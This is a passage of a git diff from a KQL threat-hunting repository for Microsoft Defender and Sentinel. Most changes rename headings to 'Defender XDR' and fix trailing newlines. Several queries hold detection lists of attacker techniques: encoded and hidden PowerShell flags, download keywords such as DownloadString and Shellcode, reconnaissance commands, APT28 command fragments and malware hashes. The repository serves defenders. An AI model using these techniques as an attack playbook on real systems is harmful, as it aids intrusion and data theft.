Overview") -``` \ No newline at end of file +``` diff --git a/Office 365/Visualization - Email - PhishDetectionReasons.md b/Office 365/Visualization - Email - PhishDetectionReasons.md index f53a618..8be9bb2 100644 --- a/Office 365/Visualization - Email - PhishDetectionReasons.md +++ b/Office 365/Visualization - Email - PhishDetectionReasons.md @@ -8,7 +8,7 @@ This query visualizes the phishing detection reasons in a piechart. This is base #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL EmailPostDeliveryEvents | where ThreatTypes == "Phish" @@ -23,4 +23,4 @@ EmailPostDeliveryEvents | extend DetectionMethod = tostring(extract(@'Phish":\["(.*?)"]', 1, DetectionMethods)) | summarize TotalEvents = count() by DetectionMethod | render piechart with(title="Phishing Detection Reason Overview") -``` \ No newline at end of file +``` diff --git a/Office 365/Visualization - Email - PostDeliveryEvents.md b/Office 365/Visualization - Email - PostDeliveryEvents.md index 5bacb2a..c37c95c 100644 --- a/Office 365/Visualization - Email - PostDeliveryEvents.md +++ b/Office 365/Visualization - Email - PostDeliveryEvents.md @@ -8,7 +8,7 @@ This query visualizes the post dilivery events from exchange to view the status #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL EmailPostDeliveryEvents | summarize TotalEvents = count() by Action @@ -19,4 +19,4 @@ EmailPostDeliveryEvents EmailPostDeliveryEvents | summarize TotalEvents = count() by Action | render piechart with(title="Post Delivery Events") -``` \ No newline at end of file +``` diff --git a/README.md b/README.md index f4081f6..d1c7b1e 100644 --- a/README.md +++ b/README.md @@ -110,7 +110,7 @@ The *[Detection Template](./DetectionTemplate.md)* can be used to standardize th If your repository is not yet listed, feel free to create a pull request (PR) or reach out via message to have it added. # Where to use KQL in Defender For Endpoint & Sentinel? -## Defender For Endpoint +## Defender XDR * Open [security.microsoft.com](https://www.security.microsoft.com) * Hunting * Advanced Hunting diff --git a/Security Operations/ComparisonIntuneandMDEDevices.md b/Security Operations/ComparisonIntuneandMDEDevices.md index a9a9a02..e9867fc 100644 --- a/Security Operations/ComparisonIntuneandMDEDevices.md +++ b/Security Operations/ComparisonIntuneandMDEDevices.md @@ -20,4 +20,4 @@ IntuneDevices | summarize arg_max(TimeGenerated, DeviceName, LastContact) by DeviceId | extend MDEStatus = iff(DeviceName in~ (MDEDevices), "MDE Onboarded", "Not Onboarded") | summarize Total = count(), Devices = make_set(DeviceName) by MDEStatus -``` \ No newline at end of file +``` diff --git a/Security Operations/DevicesCanBeOnboarded.md b/Security Operations/DevicesCanBeOnboarded.md index 291d043..535c065 100644 --- a/Security Operations/DevicesCanBeOnboarded.md +++ b/Security Operations/DevicesCanBeOnboarded.md @@ -11,7 +11,7 @@ Devices that are not onboarded can be misused without detection. #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-machines-onboarding?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL let RecentDetection = 10d; DeviceInfo @@ -28,4 +28,4 @@ DeviceInfo | summarize arg_max(TimeGenerated, *) by DeviceId | where OnboardingStatus == "Can be onboarded" | summarize TotalDevices = dcount(DeviceId), DeviceNames = make_set(DeviceName) by OSPlatform, DeviceType -``` \ No newline at end of file +``` diff --git a/Security Operations/OnboardedDeviceByOS.md b/Security Operations/OnboardedDeviceByOS.md index 6dd5d39..a444b40 100644 --- a/Security Operations/OnboardedDeviceByOS.md +++ b/Security Operations/OnboardedDeviceByOS.md @@ -8,7 +8,7 @@ This query lists how many devices have been onboarded per operating system. #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/onboard-configure?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL DeviceInfo | where OnboardingStatus == "Onboarded" @@ -21,4 +21,4 @@ DeviceInfo | where OnboardingStatus == "Onboarded" | summarize arg_max(Timestamp, *) by DeviceId | summarize TotalDevices = count() by OSPlatform -``` \ No newline at end of file +``` diff --git a/Security Operations/README.md b/Security Operations/README.md index 786ef61..9cea625 100644 --- a/Security Operations/README.md +++ b/Security Operations/README.md @@ -1 +1 @@ -This folder provides KQL queries that can be used to get insights into the SOC operations. They provide visualisations and statistics. \ No newline at end of file +This folder provides KQL queries that can be used to get insights into the SOC operations. They provide visualisations and statistics. diff --git a/Security Operations/Statistics - MostTriggeredIncidents.md b/Security Operations/Statistics - MostTriggeredIncidents.md index 2c39157..52d0739 100644 --- a/Security Operations/Statistics - MostTriggeredIncidents.md +++ b/Security Operations/Statistics - MostTriggeredIncidents.md @@ -5,7 +5,7 @@ #### Description The results of this query provide insight in the top 10 incidents that have triggered in your selected *timeframe*, this can give indications on which incidents should be addressed to limit potential false positives. -## Defender For Endpoint +## Defender XDR ```KQL // Timeframe to collect incident statistics let timeframe = 7d; @@ -28,4 +28,4 @@ SecurityIncident // Get the alert statistics | summarize Triggers = count(), AlertIds = make_set(IncidentNumber) by Title | top 10 by Triggers -``` \ No newline at end of file +``` diff --git a/Security Operations/Statistics - MostTriggeredMitreTechniques.md b/Security Operations/Statistics - MostTriggeredMitreTechniques.md index e2e7c7e..6e28e08 100644 --- a/Security Operations/Statistics - MostTriggeredMitreTechniques.md +++ b/Security Operations/Statistics - MostTriggeredMitreTechniques.md @@ -5,7 +5,7 @@ #### Description The results of this query provide insight in the top 10 MITRE ATT&CK Techniques that have been triggered in the past 10 days. This can indicate that adversaries use specific techniques to gain access to your environment. On the otherhand if this information is combined with FP/BP statistics it can give insight into the detections that need to be improved. -## Defender For Endpoint +## Defender XDR ```KQL let timeframe = 7d; AlertInfo @@ -32,4 +32,4 @@ SecurityIncident | mv-expand MitreTechnique | summarize TriggerCount = count() by tostring(MitreTechnique) | top 10 by TriggerCount -``` \ No newline at end of file +``` diff --git a/Security Operations/TotalEventsByTable.md b/Security Operations/TotalEventsByTable.md index 731d93a..46e5471 100644 --- a/Security Operations/TotalEventsByTable.md +++ b/Security Operations/TotalEventsByTable.md @@ -12,4 +12,4 @@ union * | where TimeGenerated > startofday(ago(TimeFrame)) | summarize TotalEvents = count() by Type | sort by TotalEvents asc -``` \ No newline at end of file +``` diff --git a/Security Operations/Visualization - AntivirusEventsByDay.md b/Security Operations/Visualization - AntivirusEventsByDay.md index f756b58..5918741 100644 --- a/Security Operations/Visualization - AntivirusEventsByDay.md +++ b/Security Operations/Visualization - AntivirusEventsByDay.md @@ -4,7 +4,7 @@ This query visualizes the daily antivirus detections, which can give an indication in anomalous amount of activities that are performed in your environment. -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where Timestamp > ago(30d) diff --git a/Security Operations/Visualization - DailyIncidentTriggers.md b/Security Operations/Visualization - DailyIncidentTriggers.md index ed878d0..124c9ec 100644 --- a/Security Operations/Visualization - DailyIncidentTriggers.md +++ b/Security Operations/Visualization - DailyIncidentTriggers.md @@ -5,7 +5,7 @@ #### Description Visualize the daily triggers in MDE or Sentinel in a columnchart. This can give insight into spikes in the amount of triggers. -## Defender For Endpoint +## Defender XDR ```KQL AlertInfo | where Timestamp > ago(30d) @@ -23,4 +23,4 @@ SecurityIncident | summarize arg_min(TimeGenerated, *) by IncidentNumber | summarize Total = count() by bin(TimeGenerated, 1d) | render columnchart with(title="Incident triggers last 30 days") -``` \ No newline at end of file +``` diff --git a/Security Operations/Visualization - DailyTableEvents.md b/Security Operations/Visualization - DailyTableEvents.md index 5255727..e309e5d 100644 --- a/Security Operations/Visualization - DailyTableEvents.md +++ b/Security Operations/Visualization - DailyTableEvents.md @@ -10,7 +10,7 @@ Mainly important for Sentinel users is to get insight into the amount of traffic ### References - https://learn.microsoft.com/en-us/azure/sentinel/billing-monitor-costs -## Defender For Endpoint +## Defender XDR ```KQL let TimeRange = 10d; search * @@ -28,4 +28,4 @@ search * | project Timestamp, $table | summarize Events = count() by $table, bin(Timestamp, 1d) | render columnchart with (title="Total Daily Events", kind=stacked) -``` \ No newline at end of file +``` diff --git a/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md b/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md index e1f4c0f..6675d35 100644 --- a/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md +++ b/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md @@ -15,4 +15,4 @@ The query can be used to visualize the different threat types you get from the M ThreatIntelligenceIndicator | summarize Total = count() by ThreatType | render piechart with(title="Threat Intelligence Threat Types") -``` \ No newline at end of file +``` diff --git a/Security Operations/XDRAutomaticallyClosedIncidents.md b/Security Operations/XDRAutomaticallyClosedIncidents.md index 9f94063..07d924d 100644 --- a/Security Operations/XDRAutomaticallyClosedIncidents.md +++ b/Security Operations/XDRAutomaticallyClosedIncidents.md @@ -16,4 +16,4 @@ SecurityIncident | where Status == "Closed" and Classification == "Undetermined" | where isempty(OwnerObjectID) | where isnotempty(ClassificationComment) -``` \ No newline at end of file +``` diff --git a/SecurityEvents/NltestDiscovery.md b/SecurityEvents/NltestDiscovery.md index 597db20..5a11395 100644 --- a/SecurityEvents/NltestDiscovery.md +++ b/SecurityEvents/NltestDiscovery.md @@ -32,4 +32,4 @@ SecurityEvent | where ParsedCommandLine has_any (NLTestParameters) | summarize TotalQueries = count(), TotalUniqueQueries = dcount(CommandLine), Commands = make_set(CommandLine, 100) by Computer, Account, bin(TimeGenerated, BinSize) | where TotalQueries >= Threshold -``` \ No newline at end of file +``` diff --git a/Sentinel/AnalyticsRulesEfficiency.md b/Sentinel/AnalyticsRulesEfficiency.md index 981efd9..945a6fa 100644 --- a/Sentinel/AnalyticsRulesEfficiency.md +++ b/Sentinel/AnalyticsRulesEfficiency.md @@ -34,4 +34,4 @@ SecurityIncident by tostring(RelatedAnalyticRuleIds), Title // Sort by incidents that do not trigger malicious activities | sort by TotalFalsePositive, TotalIncidentsTriggered -``` \ No newline at end of file +``` diff --git a/Sentinel/ListGlobalAdmins.md b/Sentinel/ListGlobalAdmins.md index 447bbbc..17840eb 100644 --- a/Sentinel/ListGlobalAdmins.md +++ b/Sentinel/ListGlobalAdmins.md @@ -15,4 +15,4 @@ IdentityInfo | where AssignedRoles contains "Global Admin" | distinct AccountName, AccountDomain, AccountUPN, AccountSID // If PIM is enabled for Global Admins the list shows only the Global Admins that have used PIM to gain the privileges. -``` \ No newline at end of file +``` diff --git a/Sentinel/SentinelAnomalies.md b/Sentinel/SentinelAnomalies.md index a51d518..101f435 100644 --- a/Sentinel/SentinelAnomalies.md +++ b/Sentinel/SentinelAnomalies.md @@ -15,4 +15,4 @@ Anomalies | where TimeGenerated > ago(TimeFrame) | project-rename ['Anomaly Reason'] = Description | project-reorder TimeGenerated, ['Anomaly Reason'], Entities, RuleName, Tactics -``` \ No newline at end of file +``` diff --git a/Sentinel/Summary Rules/AzureHound.md b/Sentinel/Summary Rules/AzureHound.md index 9b4c3c9..fbccbb6 100644 --- a/Sentinel/Summary Rules/AzureHound.md +++ b/Sentinel/Summary Rules/AzureHound.md @@ -1,3 +1,3 @@ # AzureHound Detection -For AzureHound see [AzureHound Detection](../../Graph%20API/AzureHound.md) \ No newline at end of file +For AzureHound see [AzureHound Detection](../../Graph%20API/AzureHound.md) diff --git a/Sentinel/Summary Rules/EntraGroupMembershipReport.md b/Sentinel/Summary Rules/EntraGroupMembershipReport.md index a3beddc..a5007fa 100644 --- a/Sentinel/Summary Rules/EntraGroupMembershipReport.md +++ b/Sentinel/Summary Rules/EntraGroupMembershipReport.md @@ -19,4 +19,4 @@ IdentityInfo | mv-expand GroupMembership | summarize TotalMemberships = dcount(tostring(GroupMembership)), MemberOf = make_set(tostring(GroupMembership), 1000) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() -``` \ No newline at end of file +``` diff --git a/Sentinel/Summary Rules/EntraRolesReport.md b/Sentinel/Summary Rules/EntraRolesReport.md index d641c95..45ab163 100644 --- a/Sentinel/Summary Rules/EntraRolesReport.md +++ b/Sentinel/Summary Rules/EntraRolesReport.md @@ -20,4 +20,4 @@ IdentityInfo | where isnotempty(AssignedRoles) | summarize TotalRoles = dcount(tostring(AssignedRoles)), Roles = make_set(tostring(AssignedRoles), 100) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() -``` \ No newline at end of file +``` diff --git a/Sentinel/Summary Rules/README.md b/Sentinel/Summary Rules/README.md index 3d4d551..68c4989 100644 --- a/Sentinel/Summary Rules/README.md +++ b/Sentinel/Summary Rules/README.md @@ -2,4 +2,4 @@ This section is dedicated to sharing Sentinel Summary Rules Documentation: [Link](https://learn.microsoft.com/en-us/azure/sentinel/summary-rules) -Related Blog: [Use Cases For Sentinel Summary Rules](https://kqlquery.com/posts/sentinel-summary-rules/) \ No newline at end of file +Related Blog: [Use Cases For Sentinel Summary Rules](https://kqlquery.com/posts/sentinel-summary-rules/) diff --git a/Sentinel/Summary Rules/UniqueActions.md b/Sentinel/Summary Rules/UniqueActions.md index 1b6ae13..24a0626 100644 --- a/Sentinel/Summary Rules/UniqueActions.md +++ b/Sentinel/Summary Rules/UniqueActions.md @@ -22,4 +22,4 @@ union * | summarize TotalEvents = count() by Type, Action | extend RetrievalDate = StartDate | sort by Type -``` \ No newline at end of file +``` diff --git a/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md b/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md index 2ebaeca..fa8c722 100644 --- a/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md +++ b/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md @@ -21,4 +21,4 @@ SecurityIncident | summarize count() by MitreTactic | sort by count_ | render columnchart with (title="Incidents triggered by MITRE ATT&CK Tactics", ytitle="Incidents Triggered") -``` \ No newline at end of file +``` diff --git a/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md b/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md index d03b7c1..e183b1c 100644 --- a/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md +++ b/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md @@ -26,4 +26,4 @@ SecurityIncident // Count the total incidents by tactic and technique | summarize count() by MitreTactic, MitreTechnique | render columnchart with (title="MITRE ATT&CK Techniques triggered by Tactic", ytitle="Total Incidents") -``` \ No newline at end of file +``` diff --git a/Threat Hunting Cases/HTTP Traffic.md b/Threat Hunting Cases/HTTP Traffic.md index 0bf14fe..0e0e90f 100644 --- a/Threat Hunting Cases/HTTP Traffic.md +++ b/Threat Hunting Cases/HTTP Traffic.md @@ -6,7 +6,7 @@ This Threat Hunting case is based on the DeviceNetworkEvents table. The goal is The first step is to investigate the amount of HTTP requests and classify them by HTTP Method. This will give insights into the behaviour of your environment. -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents | where ActionType == "NetworkSignatureInspected" @@ -36,7 +36,7 @@ DeviceNetworkEvents The next step is to dive into the files that have been downloaded with HTTP GET requests. This is done by summarizing all file extensions that have been downloaded. -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents | where ActionType == "NetworkSignatureInspected" @@ -77,7 +77,7 @@ DeviceNetworkEvents Based on a shortlist we dive into the executable files that may contain suspicious/malicious content by listing all executable files that have been downloaded using HTTP. -### Defender For Endpoint +### Defender XDR ``` let ExecutableFileExtentions = dynamic(['bat', 'cmd', 'com', 'cpl', 'ex', 'exe', 'jse', 'lnk','msc', 'ps1', 'reg', 'vb', 'vbe', 'ws', 'wsf']); DeviceNetworkEvents @@ -118,7 +118,7 @@ DeviceNetworkEvents If you found a suspicious file you can use the filename to investigate this file, using the FileProfile function. This enables us to list the file information (ThreatName, GlobalPrevalence, Signer) and a list with devices and file locations. -### Defender For Endpoint +### Defender XDR ``` let SuspiciousDownloadName = 'GoogleUpdateSetup.exe'; DeviceFileEvents @@ -143,4 +143,4 @@ DeviceFileEvents ``` ## Found Something Interesting? -If you found malicious activities take a look at the [DFIR Queries](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/tree/main/DFIR) they can help by the investigation of an incident. \ No newline at end of file +If you found malicious activities take a look at the [DFIR Queries](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/tree/main/DFIR) they can help by the investigation of an incident. diff --git a/Threat Hunting Cases/Suspicious Encoded Powershell.md b/Threat Hunting Cases/Suspicious Encoded Powershell.md index 45adf13..16be59a 100644 --- a/Threat Hunting Cases/Suspicious Encoded Powershell.md +++ b/Threat Hunting Cases/Suspicious Encoded Powershell.md @@ -6,7 +6,7 @@ Powershell can be used encoded to obfucstate the commands that have been execute In this step we list the devices that execute Powershell by the amount of encoded PowerShell commands executed. This can give an indication on which device needs to be investigated further. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let TimeFrame = 48h; //Customizable h = hours, d = days @@ -39,7 +39,7 @@ DeviceProcessEvents This is done by decoding the commands in order to be investigated. This is then listed by DeviceName the amount of unique queries that have been executed in the TimeFrame. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let TimeFrame = 48h; //Customizable h = hours, d = days @@ -78,7 +78,7 @@ DeviceProcessEvents The next step is to investigate if reconnaissance commands have been executed. The actor can hide the reconnaissance commands encoded to stay undetected. New items can be added to the ReconVariables list. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let ReconVariables = dynamic(['Get-ADGroupMember', 'Get-ADComputer', 'Get-ADUser', 'Get-NetGPOGroup', 'net user', 'whoami', 'net group', 'hostname', 'netsh firewall', 'tasklist', 'arp', 'systeminfo']); @@ -132,7 +132,7 @@ DeviceProcessEvents The last step is to investigate the connections that have been made via the encoded command. This can be C2 traffic or the download of a malicious tool that can be used by the actor. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let DownloadVariables = dynamic(['WebClient', 'DownloadFile', 'DownloadData', 'DownloadString', 'WebRequest', 'Shellcode', 'http', 'https']); diff --git a/Threat Hunting Cases/Suspicious SMB Sessions.md b/Threat Hunting Cases/Suspicious SMB Sessions.md index 37c168d..80c34a4 100644 --- a/Threat Hunting Cases/Suspicious SMB Sessions.md +++ b/Threat Hunting Cases/Suspicious SMB Sessions.md @@ -6,7 +6,7 @@ SMB can be used in various ways by attackers, such as accessing remote shares, t The first step is to get intsight in the devices that have the most unique SMB connections. There is a filter on Domain Controllers, because they normaly generate a lot of noise (via MDI), the filter can be removed if you want to include your Domain Controllers. -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let AllDomainControllers = @@ -41,7 +41,7 @@ DeviceNetworkEvents In Windows some files are known to set up benign SMB sessions or to map shares. FileNames as nmap or bloodhound can be detected via this detection rule. This is done by counting the unique SMB sessions that have been generated by each file. -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days DeviceNetworkEvents @@ -68,7 +68,7 @@ Based on the output of step 2, the files that seem suspicious can be added to th # SMB Sessions by FileName -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let FileNames = dynamic(['nmap.exe', 'bloodhound.exe']); // Add your own findings in the list, these are examples @@ -94,7 +94,7 @@ DeviceNetworkEvents This step investigates all connections made by the devices that have created suspicious connections. Those devices can be collected based on the previous steps. The endresult will be a list with al the unique IPs that have been accessed. -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let SuspiciousDevices = dynamic(['server1.com', 'laptop1.com']); @@ -121,7 +121,7 @@ DeviceNetworkEvents This section is optional, since it only helps if you suspect that the actor has performed file copies. This query will list all file copies that have been performed by the accounts that have been collected in this Threat Hunting case. -### Defender For Endpoint +### Defender XDR ``` let WhitelistedAccounts = dynamic(['account1', 'account2']); diff --git a/Threat Hunting/Behavior - AsyncRATInitialAccess.md b/Threat Hunting/Behavior - AsyncRATInitialAccess.md index 1566791..e59cfa0 100644 --- a/Threat Hunting/Behavior - AsyncRATInitialAccess.md +++ b/Threat Hunting/Behavior - AsyncRATInitialAccess.md @@ -20,7 +20,7 @@ An malicious OneNote file was opened and resulted in running AsyncRAT - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ - https://resources.infosecinstitute.com/topic/asyncrat-escapes-security-defenses/ -### Defender For Endpoint +### Defender XDR ``` EmailEvents diff --git a/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md b/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md index 09c127e..05fc526 100644 --- a/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md +++ b/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md @@ -18,7 +18,7 @@ An adversary which uses a already flagged IP go scan your network for point of i - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/discovering-internet-facing-devices-using-microsoft-defender-for/ba-p/3778975 - https://github.com/stamparm/ipsum -### Defender For Endpoint +### Defender XDR ``` // Collect Threat Intel feed information from Ipsum (Level 4), more threat can be used. For examples see TI feeds on the page: https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/tree/main/Threat%20Hunting diff --git a/Threat Hunting/Behavior - TelegramC2.md b/Threat Hunting/Behavior - TelegramC2.md index f16cbb9..9758341 100644 --- a/Threat Hunting/Behavior - TelegramC2.md +++ b/Threat Hunting/Behavior - TelegramC2.md @@ -20,7 +20,7 @@ An actor can use telgram as a Command & Control channel, while the attackers dis - https://cyware.com/news/malware-authors-leveraging-telegram-based-command-and-control-7010f17b - https://twitter.com/adamtheanalyst/status/1592561452803829760?s=46&t=0s88GjPSLLjtgcGdFsC9XQ -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Threat Hunting/Behaviour - APT28Commands.md b/Threat Hunting/Behaviour - APT28Commands.md index f2aa8c8..378a2d1 100644 --- a/Threat Hunting/Behaviour - APT28Commands.md +++ b/Threat Hunting/Behaviour - APT28Commands.md @@ -11,7 +11,7 @@ APT28 has gotten access to one of your devices and executes malicious payloads. #### References - https://cert.gov.ua/article/6276894 -## Defender For Endpoint +## Defender XDR ```KQL let APT28Commands = dynamic(['Get-Content', '-w hid -nop', '-windowstyle hidden -encodedCommand', 'start-process ssh.exe', 'Get-Content -Encoding', 'Compress-Archive', 'Get-WinEvent -FilterHashtable', 'net time', 'Get-ADDomainController', 'Get-DnsClientServerAddress', 'Get-NetAdapter', 'Get-NetAdapterBinding', 'Get-NetIPConfiguration', 'Resolve-DNSName', 'ipconfig /flushdns', 'net start dnscache', 'net stop dnscache']); let Threshold = 3; @@ -66,4 +66,4 @@ DeviceProcessEvents "Other") | summarize UniqueATP28Commands = dcount(CommandParameter), APT28CommandParameters = make_set(CommandParameter), UniqueCommands = dcount(ProcessCommandLine), Commandlines = make_set(ProcessCommandLine) by DeviceId, DeviceName, bin(TimeGenerated, BinSize) | where UniqueATP28Commands >= Threshold -``` \ No newline at end of file +``` diff --git a/Threat Hunting/Behaviour - APT28ExternalWebdav.md b/Threat Hunting/Behaviour - APT28ExternalWebdav.md index f7ee8cf..de8f223 100644 --- a/Threat Hunting/Behaviour - APT28ExternalWebdav.md +++ b/Threat Hunting/Behaviour - APT28ExternalWebdav.md @@ -19,7 +19,7 @@ APT28 has gotten access to one of your devices and executes malicious payloads. #### References - https://cert.gov.ua/article/6276894 -## Defender For Endpoint +## Defender XDR ```KQL let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; DeviceProcessEvents @@ -38,4 +38,4 @@ DeviceProcessEvents | where isnotempty(RemoteIP) | where not(ipv4_is_private(RemoteIP)) | project-reorder DeviceName, RemoteIP, ProcessCommandLine, AccountUpn -``` \ No newline at end of file +``` diff --git a/Threat Hunting/Behaviour - KillSQLProcesses.md b/Threat Hunting/Behaviour - KillSQLProcesses.md index a59eb13..6bdf243 100644 --- a/Threat Hunting/Behaviour - KillSQLProcesses.md +++ b/Threat Hunting/Behaviour - KillSQLProcesses.md @@ -24,7 +24,7 @@ An adversary kills all SQL processes before deploying ransomware on the servers #### References - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a -## Defender For Endpoint +## Defender XDR ```KQL let TotalKilledThreshold = 10; let TotalParametersThreshold = 10; @@ -59,4 +59,4 @@ DeviceProcessEvents | extend TotalKilledProcesses = array_length(AllKilledProcess) | project-reorder TimeGenerated, ProcessCommandLine, TotalParameters, TotalKilledProcesses | where TotalKilledProcesses >= TotalKilledThreshold and TotalParameters >= TotalParametersThreshold -``` \ No newline at end of file +``` diff --git a/Threat Hunting/IOC - BlackCatRansomware.md b/Threat Hunting/IOC - BlackCatRansomware.md index 0c2a30c..e7c25fa 100644 --- a/Threat Hunting/IOC - BlackCatRansomware.md +++ b/Threat Hunting/IOC - BlackCatRansomware.md @@ -4,7 +4,7 @@ #### IOC Source: https://www.ic3.gov/Media/News/2022/220420.pdf #### Publish Date: 19 April 2022 -### Defender For Endpoint +### Defender XDR ```KQL let MD5_IOCs = dynamic(['861738dd15eb7fb50568f0e39a69e107', '9f60dd752e7692a2f5c758de4eab3e6f', '09bc47d7bc5e40d40d9729cec5e39d73', diff --git a/Threat Hunting/IOC - CiscoYanluowangRansomware.md b/Threat Hunting/IOC - CiscoYanluowangRansomware.md index 9017d9b..a694339 100644 --- a/Threat Hunting/IOC - CiscoYanluowangRansomware.md +++ b/Threat Hunting/IOC - CiscoYanluowangRansomware.md @@ -4,7 +4,7 @@ #### IOC Source: https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html #### Publish Date: 10 August 2022 -### Defender For Endpoint +### Defender XDR ``` // based on https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html diff --git a/Threat Hunting/IOC - NighthawkRat.md b/Threat Hunting/IOC - NighthawkRat.md index 286f5aa..edd29a6 100644 --- a/Threat Hunting/IOC - NighthawkRat.md +++ b/Threat Hunting/IOC - NighthawkRat.md @@ -3,7 +3,7 @@ #### IOC Source: https://raw.githubusercontent.com/fboldewin/YARA-rules/master/nighthawk.yar #### Publish Date: 22 November 2022 -### Defender For Endpoint +### Defender XDR ``` let NighthawkRat = dynamic(['0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988', '9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8', '38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf', 'f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e', 'b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94']); diff --git a/Threat Hunting/Ransomware - APTNotesJoinTable.md b/Threat Hunting/Ransomware - APTNotesJoinTable.md index 14a169c..97ccee5 100644 --- a/Threat Hunting/Ransomware - APTNotesJoinTable.md +++ b/Threat Hunting/Ransomware - APTNotesJoinTable.md @@ -1,6 +1,6 @@ # APTNotes table that can be used to join with other data connectors ---- -### Defender For Endpoint +### Defender XDR ``` let APTInfo = externaldata(Filename: string, Title: string, Source: @@ -19,4 +19,4 @@ with (format="csv", ignoreFirstRecord=True); APTInfo | where Year > 2015 -``` \ No newline at end of file +``` diff --git a/Threat Hunting/Ransomware - APTNotesSHA1IOC.md b/Threat Hunting/Ransomware - APTNotesSHA1IOC.md index 349e4be..d737aed 100644 --- a/Threat Hunting/Ransomware - APTNotesSHA1IOC.md +++ b/Threat Hunting/Ransomware - APTNotesSHA1IOC.md @@ -8,7 +8,7 @@ This query uses a external csv that contains APT Ransomware note hashes. This li #### Risk An Threat Actor is deploying ransomware in your environment. -## Defender For Endpoint +## Defender XDR ```KQL let APTInfo = externaldata(Filename: string, Title: string, Source: string, Link: string, SHA1: string, Date: datetime, Year: int)[@"https://raw.githubusercontent.com/aptnotes/data/master/APTnotes.csv"] @@ -47,4 +47,4 @@ DeviceFileEvents InitiatingProcessCommandLine, SHA1 -``` \ No newline at end of file +``` diff --git a/Threat Hunting/Ransomware - LeaksiteMontitoring.md b/Threat Hunting/Ransomware - LeaksiteMontitoring.md index ab49028..5920adc 100644 --- a/Threat Hunting/Ransomware - LeaksiteMontitoring.md +++ b/Threat Hunting/Ransomware - LeaksiteMontitoring.md @@ -27,7 +27,7 @@ Relevant third parties, suppliers, or clients could be compromised and present a - [Microsoft Sentinel External Data Operator](https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/externaldata-operator?pivots=azuredataexplorer) - [Ransomware Live](https://ransomware.live/#/) -## Defender For Endpoint & Sentinel +## Defender XDR & Sentinel ```KQL //basic KQL to query recentvictims API let victims = externaldata(country:string, diff --git a/Threat Hunting/STORM-0539 URLPathsEmail.md b/Threat Hunting/STORM-0539 URLPathsEmail.md index 1e1cec3..80ccb5d 100644 --- a/Threat Hunting/STORM-0539 URLPathsEmail.md +++ b/Threat Hunting/STORM-0539 URLPathsEmail.md @@ -23,7 +23,7 @@ These URLs lead to adversary-in-the-middle (AiTM) pages that allow Storm-0539 to #### References - https://twitter.com/MsftSecIntel/status/1735351713907773711 -## Defender For Endpoint +## Defender XDR ```KQL let URLs = dynamic([@'/Udlaps/', @'/Usrlop/', @'/adls/index.html', @'/saml2/index.html']); EmailUrlInfo @@ -36,4 +36,4 @@ let URLs = dynamic([@'/Udlaps/', @'/Usrlop/', @'/adls/index.html', @'/saml2/inde EmailUrlInfo | where Url has_any (URLs) | join EmailEvents on NetworkMessageId -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md b/Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md index 62d77ee..551c6ae 100644 --- a/Threat 